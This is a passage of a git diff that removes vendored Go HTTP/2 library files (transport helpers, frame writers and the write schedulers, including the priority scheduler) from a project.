comes up with some. But currently for - // RST_STREAM there's no equivalent to GOAWAY frame's debug - // data, and the error codes are all pretty vague ("cancel"). - cc.wmu.Lock() - cc.fr.WriteRSTStream(streamID, code) - cc.bw.Flush() - cc.wmu.Unlock() -} - -var ( - errResponseHeaderListSize = errors.New("http2: response header list larger than advertised limit") - errPseudoTrailers = errors.New("http2: invalid pseudo header in trailers") -) - -func (cc *ClientConn) logf(format string, args ...interface{}) { - cc.t.logf(format, args...) -} - -func (cc *ClientConn) vlogf(format string, args ...interface{}) { - cc.t.vlogf(format, args...) -} - -func (t *Transport) vlogf(format string, args ...interface{}) { - if VerboseLogs { - t.logf(format, args...) - } -} - -func (t *Transport) logf(format string, args ...interface{}) { - log.Printf(format, args...) -} - -var noBody io.ReadCloser = ioutil.NopCloser(bytes.NewReader(nil)) - -func strSliceContains(ss []string, s string) bool { - for _, v := range ss { - if v == s { - return true - } - } - return false -} - -type erringRoundTripper struct{ err error } - -func (rt erringRoundTripper) RoundTrip(*http.Request) (*http.Response, error) { return nil, rt.err } - -// gzipReader wraps a response body so it can lazily -// call gzip.NewReader on the first call to Read -type gzipReader struct { - body io.ReadCloser // underlying Response.Body - zr *gzip.Reader // lazily-initialized gzip reader - zerr error // sticky error -} - -func (gz *gzipReader) Read(p []byte) (n int, err error) { - if gz.zerr != nil { - return 0, gz.zerr - } - if gz.zr == nil { - gz.zr, err = gzip.NewReader(gz.body) - if err != nil { - gz.zerr = err - return 0, err - } - } - return gz.zr.Read(p) -} - -func (gz *gzipReader) Close() error { - return gz.body.Close() -} - -type errorReader struct{ err error } - -func (r errorReader) Read(p []byte) (int, error) { return 0, r.err } - -// bodyWriterState encapsulates various state around the Transport's writing -// of the request body, particularly regarding doing delayed writes of the body -// when the request contains "Expect: 100-continue". -type bodyWriterState struct { - cs *clientStream - timer *time.Timer // if non-nil, we're doing a delayed write - fnonce *sync.Once // to call fn with - fn func() // the code to run in the goroutine, writing the body - resc chan error // result of fn's execution - delay time.Duration // how long we should delay a delayed write for -} - -func (t *Transport) getBodyWriterState(cs *clientStream, body io.Reader) (s bodyWriterState) { - s.cs = cs - if body == nil { - return - } - resc := make(chan error, 1) - s.resc = resc - s.fn = func() { - cs.cc.mu.Lock() - cs.startedWrite = true - cs.cc.mu.Unlock() - resc <- cs.writeRequestBody(body, cs.req.Body) - } - s.delay = t.expectContinueTimeout() - if s.delay == 0 || - !httplex.HeaderValuesContainsToken( - cs.req.Header["Expect"], - "100-continue") { - return - } - s.fnonce = new(sync.Once) - - // Arm the timer with a very large duration, which we'll - // intentionally lower later. It has to be large now because - // we need a handle to it before writing the headers, but the - // s.delay value is defined to not start until after the - // request headers were written. - const hugeDuration = 365 * 24 * time.Hour - s.timer = time.AfterFunc(hugeDuration, func() { - s.fnonce.Do(s.fn) - }) - return -} - -func (s bodyWriterState) cancel() { - if s.timer != nil { - s.timer.Stop() - } -} - -func (s bodyWriterState) on100() { - if s.timer == nil { - // If we didn't do a delayed write, ignore the server's - // bogus 100 continue response. - return - } - s.timer.Stop() - go func() { s.fnonce.Do(s.fn) }() -} - -// scheduleBodyWrite starts writing the body, either immediately (in -// the common case) or after the delay timeout. It should not be -// called until after the headers have been written. -func (s bodyWriterState) scheduleBodyWrite() { - if s.timer == nil { - // We're not doing a delayed write (see - // getBodyWriterState), so just start the writing - // goroutine immediately. - go s.fn() - return - } - traceWait100Continue(s.cs.trace) - if s.timer.Stop() { - s.timer.Reset(s.delay) - } -} - -// isConnectionCloseRequest reports whether req should use its own -// connection for a single request and then close the connection. -func isConnectionCloseRequest(req *http.Request) bool { - return req.Close || httplex.HeaderValuesContainsToken(req.Header["Connection"], "close") -} diff --git a/vendor/golang.org/x/net/http2/write.go b/vendor/golang.org/x/net/http2/write.go deleted file mode 100644 index 6b0dfae3..00000000 --- a/vendor/golang.org/x/net/http2/write.go +++ /dev/null @@ -1,370 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "bytes" - "fmt" - "log" - "net/http" - "net/url" - "time" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/lex/httplex" -) - -// writeFramer is implemented by any type that is used to write frames. -type writeFramer interface { - writeFrame(writeContext) error - - // staysWithinBuffer reports whether this writer promises that - // it will only write less than or equal to size bytes, and it - // won't Flush the write context. - staysWithinBuffer(size int) bool -} - -// writeContext is the interface needed by the various frame writer -// types below. All the writeFrame methods below are scheduled via the -// frame writing scheduler (see writeScheduler in writesched.go). -// -// This interface is implemented by *serverConn. -// -// TODO: decide whether to a) use this in the client code (which didn't -// end up using this yet, because it has a simpler design, not -// currently implementing priorities), or b) delete this and -// make the server code a bit more concrete. -type writeContext interface { - Framer() *Framer - Flush() error - CloseConn() error - // HeaderEncoder returns an HPACK encoder that writes to the - // returned buffer. - HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) -} - -// writeEndsStream reports whether w writes a frame that will transition -// the stream to a half-closed local state. This returns false for RST_STREAM, -// which closes the entire stream (not just the local half). -func writeEndsStream(w writeFramer) bool { - switch v := w.(type) { - case *writeData: - return v.endStream - case *writeResHeaders: - return v.endStream - case nil: - // This can only happen if the caller reuses w after it's - // been intentionally nil'ed out to prevent use. Keep this - // here to catch future refactoring breaking it. - panic("writeEndsStream called on nil writeFramer") - } - return false -} - -type flushFrameWriter struct{} - -func (flushFrameWriter) writeFrame(ctx writeContext) error { - return ctx.Flush() -} - -func (flushFrameWriter) staysWithinBuffer(max int) bool { return false } - -type writeSettings []Setting - -func (s writeSettings) staysWithinBuffer(max int) bool { - const settingSize = 6 // uint16 + uint32 - return frameHeaderLen+settingSize*len(s) <= max - -} - -func (s writeSettings) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteSettings([]Setting(s)...) -} - -type writeGoAway struct { - maxStreamID uint32 - code ErrCode -} - -func (p *writeGoAway) writeFrame(ctx writeContext) error { - err := ctx.Framer().WriteGoAway(p.maxStreamID, p.code, nil) - if p.code != 0 { - ctx.Flush() // ignore error: we're hanging up on them anyway - time.Sleep(50 * time.Millisecond) - ctx.CloseConn() - } - return err -} - -func (*writeGoAway) staysWithinBuffer(max int) bool { return false } // flushes - -type writeData struct { - streamID uint32 - p []byte - endStream bool -} - -func (w *writeData) String() string { - return fmt.Sprintf("writeData(stream=%d, p=%d, endStream=%v)", w.streamID, len(w.p), w.endStream) -} - -func (w *writeData) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteData(w.streamID, w.endStream, w.p) -} - -func (w *writeData) staysWithinBuffer(max int) bool { - return frameHeaderLen+len(w.p) <= max -} - -// handlerPanicRST is the message sent from handler goroutines when -// the handler panics. -type handlerPanicRST struct { - StreamID uint32 -} - -func (hp handlerPanicRST) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteRSTStream(hp.StreamID, ErrCodeInternal) -} - -func (hp handlerPanicRST) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -func (se StreamError) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteRSTStream(se.StreamID, se.Code) -} - -func (se StreamError) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -type writePingAck struct{ pf *PingFrame } - -func (w writePingAck) writeFrame(ctx writeContext) error { - return ctx.Framer().WritePing(true, w.pf.Data) -} - -func (w writePingAck) staysWithinBuffer(max int) bool { return frameHeaderLen+len(w.pf.Data) <= max } - -type writeSettingsAck struct{} - -func (writeSettingsAck) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteSettingsAck() -} - -func (writeSettingsAck) staysWithinBuffer(max int) bool { return frameHeaderLen <= max } - -// splitHeaderBlock splits headerBlock into fragments so that each fragment fits -// in a single frame, then calls fn for each fragment. firstFrag/lastFrag are true -// for the first/last fragment, respectively. -func splitHeaderBlock(ctx writeContext, headerBlock []byte, fn func(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error) error { - // For now we're lazy and just pick the minimum MAX_FRAME_SIZE - // that all peers must support (16KB). Later we could care - // more and send larger frames if the peer advertised it, but - // there's little point. Most headers are small anyway (so we - // generally won't have CONTINUATION frames), and extra frames - // only waste 9 bytes anyway. - const maxFrameSize = 16384 - - first := true - for len(headerBlock) > 0 { - frag := headerBlock - if len(frag) > maxFrameSize { - frag = frag[:maxFrameSize] - } - headerBlock = headerBlock[len(frag):] - if err := fn(ctx, frag, first, len(headerBlock) == 0); err != nil { - return err - } - first = false - } - return nil -} - -// writeResHeaders is a request to write a HEADERS and 0+ CONTINUATION frames -// for HTTP response headers or trailers from a server handler. -type writeResHeaders struct { - streamID uint32 - httpResCode int // 0 means no ":status" line - h http.Header // may be nil - trailers []string // if non-nil, which keys of h to write. nil means all. - endStream bool - - date string - contentType string - contentLength string -} - -func encKV(enc *hpack.Encoder, k, v string) { - if VerboseLogs { - log.Printf("http2: server encoding header %q = %q", k, v) - } - enc.WriteField(hpack.HeaderField{Name: k, Value: v}) -} - -func (w *writeResHeaders) staysWithinBuffer(max int) bool { - // TODO: this is a common one. It'd be nice to return true - // here and get into the fast path if we could be clever and - // calculate the size fast enough, or at least a conservative - // uppper bound that usually fires. (Maybe if w.h and - // w.trailers are nil, so we don't need to enumerate it.) - // Otherwise I'm afraid that just calculating the length to - // answer this question would be slower than the ~2µs benefit. - return false -} - -func (w *writeResHeaders) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - - if w.httpResCode != 0 { - encKV(enc, ":status", httpCodeString(w.httpResCode)) - } - - encodeHeaders(enc, w.h, w.trailers) - - if w.contentType != "" { - encKV(enc, "content-type", w.contentType) - } - if w.contentLength != "" { - encKV(enc, "content-length", w.contentLength) - } - if w.date != "" { - encKV(enc, "date", w.date) - } - - headerBlock := buf.Bytes() - if len(headerBlock) == 0 && w.trailers == nil { - panic("unexpected empty hpack") - } - - return splitHeaderBlock(ctx, headerBlock, w.writeHeaderBlock) -} - -func (w *writeResHeaders) writeHeaderBlock(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error { - if firstFrag { - return ctx.Framer().WriteHeaders(HeadersFrameParam{ - StreamID: w.streamID, - BlockFragment: frag, - EndStream: w.endStream, - EndHeaders: lastFrag, - }) - } else { - return ctx.Framer().WriteContinuation(w.streamID, lastFrag, frag) - } -} - -// writePushPromise is a request to write a PUSH_PROMISE and 0+ CONTINUATION frames. -type writePushPromise struct { - streamID uint32 // pusher stream - method string // for :method - url *url.URL // for :scheme, :authority, :path - h http.Header - - // Creates an ID for a pushed stream. This runs on serveG just before - // the frame is written. The returned ID is copied to promisedID. - allocatePromisedID func() (uint32, error) - promisedID uint32 -} - -func (w *writePushPromise) staysWithinBuffer(max int) bool { - // TODO: see writeResHeaders.staysWithinBuffer - return false -} - -func (w *writePushPromise) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - - encKV(enc, ":method", w.method) - encKV(enc, ":scheme", w.url.Scheme) - encKV(enc, ":authority", w.url.Host) - encKV(enc, ":path", w.url.RequestURI()) - encodeHeaders(enc, w.h, nil) - - headerBlock := buf.Bytes() - if len(headerBlock) == 0 { - panic("unexpected empty hpack") - } - - return splitHeaderBlock(ctx, headerBlock, w.writeHeaderBlock) -} - -func (w *writePushPromise) writeHeaderBlock(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error { - if firstFrag { - return ctx.Framer().WritePushPromise(PushPromiseParam{ - StreamID: w.streamID, - PromiseID: w.promisedID, - BlockFragment: frag, - EndHeaders: lastFrag, - }) - } else { - return ctx.Framer().WriteContinuation(w.streamID, lastFrag, frag) - } -} - -type write100ContinueHeadersFrame struct { - streamID uint32 -} - -func (w write100ContinueHeadersFrame) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - encKV(enc, ":status", "100") - return ctx.Framer().WriteHeaders(HeadersFrameParam{ - StreamID: w.streamID, - BlockFragment: buf.Bytes(), - EndStream: false, - EndHeaders: true, - }) -} - -func (w write100ContinueHeadersFrame) staysWithinBuffer(max int) bool { - // Sloppy but conservative: - return 9+2*(len(":status")+len("100")) <= max -} - -type writeWindowUpdate struct { - streamID uint32 // or 0 for conn-level - n uint32 -} - -func (wu writeWindowUpdate) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -func (wu writeWindowUpdate) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteWindowUpdate(wu.streamID, wu.n) -} - -// encodeHeaders encodes an http.Header. If keys is not nil, then (k, h[k]) -// is encoded only only if k is in keys. -func encodeHeaders(enc *hpack.Encoder, h http.Header, keys []string) { - if keys == nil { - sorter := sorterPool.Get().(*sorter) - // Using defer here, since the returned keys from the - // sorter.Keys method is only valid until the sorter - // is returned: - defer sorterPool.Put(sorter) - keys = sorter.Keys(h) - } - for _, k := range keys { - vv := h[k] - k = lowerHeader(k) - if !validWireHeaderFieldName(k) { - // Skip it as backup paranoia. Per - // golang.org/issue/14048, these should - // already be rejected at a higher level. - continue - } - isTE := k == "transfer-encoding" - for _, v := range vv { - if !httplex.ValidHeaderFieldValue(v) { - // TODO: return an error? golang.org/issue/14048 - // For now just omit it. - continue - } - // TODO: more of "8.1.2.2 Connection-Specific Header Fields" - if isTE && v != "trailers" { - continue - } - encKV(enc, k, v) - } - } -} diff --git a/vendor/golang.org/x/net/http2/writesched.go b/vendor/golang.org/x/net/http2/writesched.go deleted file mode 100644 index 4fe30730..00000000 --- a/vendor/golang.org/x/net/http2/writesched.go +++ /dev/null @@ -1,242 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import "fmt" - -// WriteScheduler is the interface implemented by HTTP/2 write schedulers. -// Methods are never called concurrently. -type WriteScheduler interface { - // OpenStream opens a new stream in the write scheduler. - // It is illegal to call this with streamID=0 or with a streamID that is - // already open -- the call may panic. - OpenStream(streamID uint32, options OpenStreamOptions) - - // CloseStream closes a stream in the write scheduler. Any frames queued on - // this stream should be discarded. It is illegal to call this on a stream - // that is not open -- the call may panic. - CloseStream(streamID uint32) - - // AdjustStream adjusts the priority of the given stream. This may be called - // on a stream that has not yet been opened or has been closed. Note that - // RFC 7540 allows PRIORITY frames to be sent on streams in any state. See: - // https://tools.ietf.org/html/rfc7540#section-5.1 - AdjustStream(streamID uint32, priority PriorityParam) - - // Push queues a frame in the scheduler. In most cases, this will not be - // called with wr.StreamID()!=0 unless that stream is currently open. The one - // exception is RST_STREAM frames, which may be sent on idle or closed streams. - Push(wr FrameWriteRequest) - - // Pop dequeues the next frame to write. Returns false if no frames can - // be written. Frames with a given wr.StreamID() are Pop'd in the same - // order they are Push'd. - Pop() (wr FrameWriteRequest, ok bool) -} - -// OpenStreamOptions specifies extra options for WriteScheduler.OpenStream. -type OpenStreamOptions struct { - // PusherID is zero if the stream was initiated by the client. Otherwise, - // PusherID names the stream that pushed the newly opened stream. - PusherID uint32 -} - -// FrameWriteRequest is a request to write a frame. -type FrameWriteRequest struct { - // write is the interface value that does the writing, once the - // WriteScheduler has selected this frame to write. The write - // functions are all defined in write.go. - write writeFramer - - // stream is the stream on which this frame will be written. - // nil for non-stream frames like PING and SETTINGS. - stream *stream - - // done, if non-nil, must be a buffered channel with space for - // 1 message and is sent the return value from write (or an - // earlier error) when the frame has been written. - done chan error -} - -// StreamID returns the id of the stream this frame will be written to. -// 0 is used for non-stream frames such as PING and SETTINGS. -func (wr FrameWriteRequest) StreamID() uint32 { - if wr.stream == nil { - if se, ok := wr.write.(StreamError); ok { - // (*serverConn).resetStream doesn't set - // stream because it doesn't necessarily have - // one. So special case this type of write - // message. - return se.StreamID - } - return 0 - } - return wr.stream.id -} - -// DataSize returns the number of flow control bytes that must be consumed -// to write this entire frame. This is 0 for non-DATA frames. -func (wr FrameWriteRequest) DataSize() int { - if wd, ok := wr.write.(*writeData); ok { - return len(wd.p) - } - return 0 -} - -// Consume consumes min(n, available) bytes from this frame, where available -// is the number of flow control bytes available on the stream. Consume returns -// 0, 1, or 2 frames, where the integer return value gives the number of frames -// returned. -// -// If flow control prevents consuming any bytes, this returns (_, _, 0). If -// the entire frame was consumed, this returns (wr, _, 1). Otherwise, this -// returns (consumed, rest, 2), where 'consumed' contains the consumed bytes and -// 'rest' contains the remaining bytes. The consumed bytes are deducted from the -// underlying stream's flow control budget. -func (wr FrameWriteRequest) Consume(n int32) (FrameWriteRequest, FrameWriteRequest, int) { - var empty FrameWriteRequest - - // Non-DATA frames are always consumed whole. - wd, ok := wr.write.(*writeData) - if !ok || len(wd.p) == 0 { - return wr, empty, 1 - } - - // Might need to split after applying limits. - allowed := wr.stream.flow.available() - if n < allowed { - allowed = n - } - if wr.stream.sc.maxFrameSize < allowed { - allowed = wr.stream.sc.maxFrameSize - } - if allowed <= 0 { - return empty, empty, 0 - } - if len(wd.p) > int(allowed) { - wr.stream.flow.take(allowed) - consumed := FrameWriteRequest{ - stream: wr.stream, - write: &writeData{ - streamID: wd.streamID, - p: wd.p[:allowed], - // Even if the original had endStream set, there - // are bytes remaining because len(wd.p) > allowed, - // so we know endStream is false. - endStream: false, - }, - // Our caller is blocking on the final DATA frame, not - // this intermediate frame, so no need to wait. - done: nil, - } - rest := FrameWriteRequest{ - stream: wr.stream, - write: &writeData{ - streamID: wd.streamID, - p: wd.p[allowed:], - endStream: wd.endStream, - }, - done: wr.done, - } - return consumed, rest, 2 - } - - // The frame is consumed whole. - // NB: This cast cannot overflow because allowed is <= math.MaxInt32. - wr.stream.flow.take(int32(len(wd.p))) - return wr, empty, 1 -} - -// String is for debugging only. -func (wr FrameWriteRequest) String() string { - var des string - if s, ok := wr.write.(fmt.Stringer); ok { - des = s.String() - } else { - des = fmt.Sprintf("%T", wr.write) - } - return fmt.Sprintf("[FrameWriteRequest stream=%d, ch=%v, writer=%v]", wr.StreamID(), wr.done != nil, des) -} - -// replyToWriter sends err to wr.done and panics if the send must block -// This does nothing if wr.done is nil. -func (wr *FrameWriteRequest) replyToWriter(err error) { - if wr.done == nil { - return - } - select { - case wr.done <- err: - default: - panic(fmt.Sprintf("unbuffered done channel passed in for type %T", wr.write)) - } - wr.write = nil // prevent use (assume it's tainted after wr.done send) -} - -// writeQueue is used by implementations of WriteScheduler. -type writeQueue struct { - s []FrameWriteRequest -} - -func (q *writeQueue) empty() bool { return len(q.s) == 0 } - -func (q *writeQueue) push(wr FrameWriteRequest) { - q.s = append(q.s, wr) -} - -func (q *writeQueue) shift() FrameWriteRequest { - if len(q.s) == 0 { - panic("invalid use of queue") - } - wr := q.s[0] - // TODO: less copy-happy queue. - copy(q.s, q.s[1:]) - q.s[len(q.s)-1] = FrameWriteRequest{} - q.s = q.s[:len(q.s)-1] - return wr -} - -// consume consumes up to n bytes from q.s[0]. If the frame is -// entirely consumed, it is removed from the queue. If the frame -// is partially consumed, the frame is kept with the consumed -// bytes removed. Returns true iff any bytes were consumed. -func (q *writeQueue) consume(n int32) (FrameWriteRequest, bool) { - if len(q.s) == 0 { - return FrameWriteRequest{}, false - } - consumed, rest, numresult := q.s[0].Consume(n) - switch numresult { - case 0: - return FrameWriteRequest{}, false - case 1: - q.shift() - case 2: - q.s[0] = rest - } - return consumed, true -} - -type writeQueuePool []*writeQueue - -// put inserts an unused writeQueue into the pool. -func (p *writeQueuePool) put(q *writeQueue) { - for i := range q.s { - q.s[i] = FrameWriteRequest{} - } - q.s = q.s[:0] - *p = append(*p, q) -} - -// get returns an empty writeQueue. -func (p *writeQueuePool) get() *writeQueue { - ln := len(*p) - if ln == 0 { - return new(writeQueue) - } - x := ln - 1 - q := (*p)[x] - (*p)[x] = nil - *p = (*p)[:x] - return q -} diff --git a/vendor/golang.org/x/net/http2/writesched_priority.go b/vendor/golang.org/x/net/http2/writesched_priority.go deleted file mode 100644 index 848fed6e..00000000 --- a/vendor/golang.org/x/net/http2/writesched_priority.go +++ /dev/null @@ -1,452 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "fmt" - "math" - "sort" -) - -// RFC 7540, Section 5.3.5: the default weight is 16. -const priorityDefaultWeight = 15 // 16 = 15 + 1 - -// PriorityWriteSchedulerConfig configures a priorityWriteScheduler. -type PriorityWriteSchedulerConfig struct { - // MaxClosedNodesInTree controls the maximum number of closed streams to - // retain in the priority tree. Setting this to zero saves a small amount - // of memory at the cost of performance. - // - // See RFC 7540, Section 5.3.4: - // "It is possible for a stream to become closed while prioritization - // information ... is in transit. ... This potentially creates suboptimal - // prioritization, since the stream could be given a priority that is - // different from what is intended. To avoid these problems, an endpoint - // SHOULD retain stream prioritization state for a period after streams - // become closed. The longer state is retained, the lower the chance that - // streams are assigned incorrect or default priority values." - MaxClosedNodesInTree int - - // MaxIdleNodesInTree controls the maximum number of idle streams to - // retain in the priority tree. Setting this to zero saves a small amount - // of memory at the cost of performance. - // - // See RFC 7540, Section 5.3.4: - // Similarly, streams that are in the "idle" state can be assigned - // priority or become a parent of other streams. This allows for the - // creation of a grouping node in the dependency tree, which enables - // more flexible expressions of priority. Idle streams begin with a - // default priority (Section 5.3.5). - MaxIdleNodesInTree int - - // ThrottleOutOfOrderWrites enables write throttling to help ensure that - // data is delivered in priority order. This works around a race where - // stream B depends on stream A and both streams are about to call Write - // to queue DATA frames. If B wins the race, a naive scheduler would eagerly - // write as much data from B as possible, but this is suboptimal because A - // is a higher-priority stream. With throttling enabled, we write a small - // amount of data from B to minimize the amount of bandwidth that B can - // steal from A. - ThrottleOutOfOrderWrites bool -} - -// NewPriorityWriteScheduler constructs a WriteScheduler that schedules -// frames by following HTTP/2 priorities as described in RFC 7540 Section 5.3. -// If cfg is nil, default options are used. -func NewPriorityWriteScheduler(cfg *PriorityWriteSchedulerConfig) WriteScheduler { - if cfg == nil { - // For justification of these defaults, see: - // https://docs.google.com/document/d/1oLhNg1skaWD4_DtaoCxdSRN5erEXrH-KnLrMwEpOtFY - cfg = &PriorityWriteSchedulerConfig{ - MaxClosedNodesInTree: 10, - MaxIdleNodesInTree: 10, - ThrottleOutOfOrderWrites: false, - } - } - - ws := &priorityWriteScheduler{ - nodes: make(map[uint32]*priorityNode), - maxClosedNodesInTree: cfg.MaxClosedNodesInTree, - maxIdleNodesInTree: cfg.MaxIdleNodesInTree, - enableWriteThrottle: cfg.ThrottleOutOfOrderWrites, - } - ws.nodes[0] = &ws.root - if cfg.ThrottleOutOfOrderWrites { - ws.writeThrottleLimit = 1024 - } else { - ws.writeThrottleLimit = math.MaxInt32 - } - return ws -} - -type priorityNodeState int - -const ( - priorityNodeOpen priorityNodeState = iota - priorityNodeClosed - priorityNodeIdle -) - -// priorityNode is a node in an HTTP/2 priority tree. -// Each node is associated with a single stream ID. -// See RFC 7540, Section 5.3. -type priorityNode struct { - q writeQueue // queue of pending frames to write - id uint32 // id of the stream, or 0 for the root of the tree - weight uint8 // the actual weight is weight+1, so the value is in [1,256] - state priorityNodeState // open | closed | idle - bytes int64 // number of bytes written by this node, or 0 if closed - subtreeBytes int64 // sum(node.bytes) of all nodes in this subtree - - // These links form the priority tree. - parent *priorityNode - kids *priorityNode // start of the kids list - prev, next *priorityNode // doubly-linked list of siblings -} - -func (n *priorityNode) setParent(parent *priorityNode) { - if n == parent { - panic("setParent to self") - } - if n.parent == parent { - return - } - // Unlink from current parent. - if parent := n.parent; parent != nil { - if n.prev == nil { - parent.kids = n.next - } else { - n.prev.next = n.next - } - if n.next != nil { - n.next.prev = n.prev - } - } - // Link to new parent. - // If parent=nil, remove n from the tree. - // Always insert at the head of parent.kids (this is assumed by walkReadyInOrder). - n.parent = parent - if parent == nil { - n.next = nil - n.prev = nil - } else { - n.next = parent.kids - n.prev = nil - if n.next != nil { - n.next.prev = n - } - parent.kids = n - } -} - -func (n *priorityNode) addBytes(b int64) { - n.bytes += b - for ; n != nil; n = n.parent { - n.subtreeBytes += b - } -} - -// walkReadyInOrder iterates over the tree in priority order, calling f for each node -// with a non-empty write queue. When f returns true, this funcion returns true and the -// walk halts. tmp is used as scratch space for sorting. -// -// f(n, openParent) takes two arguments: the node to visit, n, and a bool that is true -// if any ancestor p of n is still open (ignoring the root node). -func (n *priorityNode) walkReadyInOrder(openParent bool, tmp *[]*priorityNode, f func(*priorityNode, bool) bool) bool { - if !n.q.empty() && f(n, openParent) { - return true - } - if n.kids == nil { - return false - } - - // Don't consider the root "open" when updating openParent since - // we can't send data frames on the root stream (only control frames). - if n.id != 0 { - openParent = openParent || (n.state == priorityNodeOpen) - } - - // Common case: only one kid or all kids have the same weight. - // Some clients don't use weights; other clients (like web browsers) - // use mostly-linear priority trees. - w := n.kids.weight - needSort := false - for k := n.kids.next; k != nil; k = k.next { - if k.weight != w { - needSort = true - break - } - } - if !needSort { - for k := n.kids; k != nil; k = k.next { - if k.walkReadyInOrder(openParent, tmp, f) { - return true - } - } - return false - } - - // Uncommon case: sort the child nodes. We remove the kids from the parent, - // then re-insert after sorting so we can reuse tmp for future sort calls. - *tmp = (*tmp)[:0] - for n.kids != nil { - *tmp = append(*tmp, n.kids) - n.kids.setParent(nil) - } - sort.Sort(sortPriorityNodeSiblings(*tmp)) - for i := len(*tmp) - 1; i >= 0; i-- { - (*tmp)[i].setParent(n) // setParent inserts at the head of n.kids - } - for k := n.kids; k != nil; k = k.next { - if k.walkReadyInOrder(openParent, tmp, f) { - return true - } - } - return false -} - -type sortPriorityNodeSiblings []*priorityNode - -func (z sortPriorityNodeSiblings) Len() int { return len(z) } -func (z sortPriorityNodeSiblings) Swap(i, k int) { z[i], z[k] = z[k], z[i] } -func (z sortPriorityNodeSiblings) Less(i, k int) bool { - // Prefer the subtree that has sent fewer bytes relative to its weight. - // See sections 5.3.2 and 5.3.4. - wi, bi := float64(z[i].weight+1), float64(z[i].subtreeBytes) - wk, bk := float64(z[k].weight+1), float64(z[k].subtreeBytes) - if bi == 0 && bk == 0 { - return wi >= wk - } - if bk == 0 { - return false - } - return bi/bk <= wi/wk -} - -type priorityWriteScheduler struct { - // root is the root of the priority tree, where root.id = 0. - // The root queues control frames that are not associated with any stream. - root priorityNode - - // nodes maps stream ids to priority tree nodes. - nodes map[uint32]*priorityNode - - // maxID is the maximum stream id in nodes. - maxID uint32 - - // lists of nodes that have been closed or are idle, but are kept in - // the tree for improved prioritization. When the lengths exceed either - // maxClosedNodesInTree or maxIdleNodesInTree, old nodes are discarded. - closedNodes, idleNodes []*priorityNode - - // From the config. - maxClosedNodesInTree int - maxIdleNodesInTree int - writeThrottleLimit int32 - enableWriteThrottle bool - - // tmp is scratch space for priorityNode.walkReadyInOrder to reduce allocations. - tmp []*priorityNode - - // pool of empty queues for reuse. - queuePool writeQueuePool -} - -func (ws *priorityWriteScheduler) OpenStream(streamID uint32, options OpenStreamOptions) { - // The stream may be currently idle but cannot be opened or closed. - if curr := ws.nodes[streamID]; curr != nil { - if curr.state != priorityNodeIdle { - panic(fmt.Sprintf("stream %d already opened", streamID)) - } - curr.state = priorityNodeOpen - return - } - - // RFC 7540, Section 5.3.5: - // "All streams are initially assigned a non-exclusive dependency on stream 0x0. - // Pushed streams initially depend on their associated stream. In both cases, - // streams are assigned a default weight of 16." - parent := ws.nodes[options.PusherID] - if parent == nil { - parent = &ws.root - } - n := &priorityNode{ - q: *ws.queuePool.get(), - id: streamID, - weight: priorityDefaultWeight, - state: priorityNodeOpen, - } - n.setParent(parent) - ws.nodes[streamID] = n - if streamID > ws.maxID { - ws.maxID = streamID - } -} - -func (ws *priorityWriteScheduler) CloseStream(streamID uint32) { - if streamID == 0 { - panic("violation of WriteScheduler interface: cannot close stream 0") - } - if ws.nodes[streamID] == nil { - panic(fmt.Sprintf("violation of WriteScheduler interface: unknown stream %d", streamID)) - } - if ws.nodes[streamID].state != priorityNodeOpen { - panic(fmt.Sprintf("violation of WriteScheduler interface: stream %d already closed", streamID)) - } - - n := ws.nodes[streamID] - n.state = priorityNodeClosed - n.addBytes(-n.bytes) - - q := n.q - ws.queuePool.put(&q) - n.q.s = nil - if ws.maxClosedNodesInTree > 0 { - ws.addClosedOrIdleNode(&ws.closedNodes, ws.maxClosedNodesInTree, n) - } else { - ws.removeNode(n) - } -} - -func (ws *priorityWriteScheduler) AdjustStream(streamID uint32, priority PriorityParam) { - if streamID == 0 { - panic("adjustPriority on root") - } - - // If streamID does not exist, there are two cases: - // - A closed stream that has been removed (this will have ID <= maxID) - // - An idle stream that is being used for "grouping" (this will have ID > maxID) - n := ws.nodes[streamID] - if n == nil { - if streamID <= ws.maxID || ws.maxIdleNodesInTree == 0 { - return - } - ws.maxID = streamID - n = &priorityNode{ - q: *ws.queuePool.get(), - id: streamID, - weight: priorityDefaultWeight, - state: priorityNodeIdle, - } - n.setParent(&ws.root) - ws.nodes[streamID] = n - ws.addClosedOrIdleNode(&ws.idleNodes, ws.maxIdleNodesInTree, n) - } - - // Section 5.3.1: A dependency on a stream that is not currently in the tree - // results in that stream being given a default priority (Section 5.3.5). - parent := ws.nodes[priority.StreamDep] - if parent == nil { - n.setParent(&ws.root) - n.weight = priorityDefaultWeight - return - } - - // Ignore if the client tries to make a node its own parent. - if n == parent { - return - } - - // Section 5.3.3: - // "If a stream is made dependent on one of its own dependencies, the - // formerly dependent stream is first moved to be dependent on the - // reprioritized stream's previous parent. The moved dependency retains - // its weight." - // - // That is: if parent depends on n, move parent to depend on n.parent. - for x := parent.parent; x != nil; x = x.parent { - if x == n { - parent.setParent(n.parent) - break - } - } - - // Section 5.3.3: The exclusive flag causes the stream to become the sole - // dependency of its parent stream, causing other dependencies to become - // dependent on the exclusive stream. - if priority.Exclusive { - k := parent.kids - for k != nil { - next := k.next - if k != n { - k.setParent(n) - } - k = next - } - } - - 